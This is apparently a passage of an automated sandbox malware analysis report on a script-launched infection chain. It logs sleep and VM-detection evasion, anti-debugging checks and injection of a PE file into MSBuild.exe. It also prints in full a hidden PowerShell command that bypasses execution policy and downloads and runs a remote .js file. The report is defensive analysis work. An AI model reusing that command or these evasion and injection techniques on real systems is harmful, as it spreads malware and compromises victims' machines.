Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_0040E54F Sleep,ExitProcess,

27_2_0040E54F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

12_2_0040DD85

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

27_2_004198D2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599890
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599781
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599562
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599344
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599219
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599109
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598781
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598561
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598451
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598086
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 597983
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 597873
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 597766
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 597641

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4497	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5393	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3122	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3371	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 7052	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 2646	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6688
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3054

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 9.4 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 4.8 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872	Thread sleep count: 3122 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep count: 3371 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7928	Thread sleep count: 7052 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7928	Thread sleep time: -21156000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7984	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7984	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7984	Thread sleep count: 100 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7984	Thread sleep count: 99 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7928	Thread sleep count: 2646 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7928	Thread sleep time: -7938000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6244	Thread sleep count: 6688 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548	Thread sleep count: 3054 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -599890s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -599781s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -599672s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -599562s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -599453s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -599344s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -599219s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -599109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -599000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -598891s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -598781s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -598672s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -598561s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -598451s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -598086s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -597983s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -597873s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -597766s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368	Thread sleep time: -597641s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4592	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,	12_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	13_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	15_2_00407898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	27_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	27_2_0041B43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	27_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	27_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00406AC2 FindFirstFileW,FindNextFileW,	27_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	27_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,	27_2_00418C79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	27_2_00408DA7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

27_2_00406F06

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 12_2_00418981 memset,GetSystemInfo,

12_2_00418981

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599890
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599781
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599562
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599344
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599219
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599109
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598781
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598561
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598451
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598086
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 597983
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 597873
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 597766
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 597641

Source: wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\;
Source: wscript.exe, 00000000.00000003.1658423397.0000024B549DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660109646.0000024B549DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660070206.0000024B5499B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657501584.0000024B549DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657501584.0000024B5499B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000006.00000002.2400023450.000002E3A8CFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000000.00000002.1660070206.0000024B5499B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657501584.0000024B5499B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: powershell.exe, 00000006.00000002.2398895360.000002E3A8CC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

API call chain: ExitProcess graph end node

graph_13-33813

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

27_2_0043A66D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

12_2_0040DD85

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

12_2_004044A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_00442564 mov eax, dword ptr fs:[00000030h]

27_2_00442564

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_0044E93E GetProcessHeap,

27_2_0044E93E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	27_2_00434178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_0043A66D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00433B54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00433CE7 SetUnhandledExceptionFilter,	27_2_00433CE7

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 188.114.96.3 443

Jump to behavior

Bypasses PowerShell execution policy

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'"

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 62A008	Jump to behavior
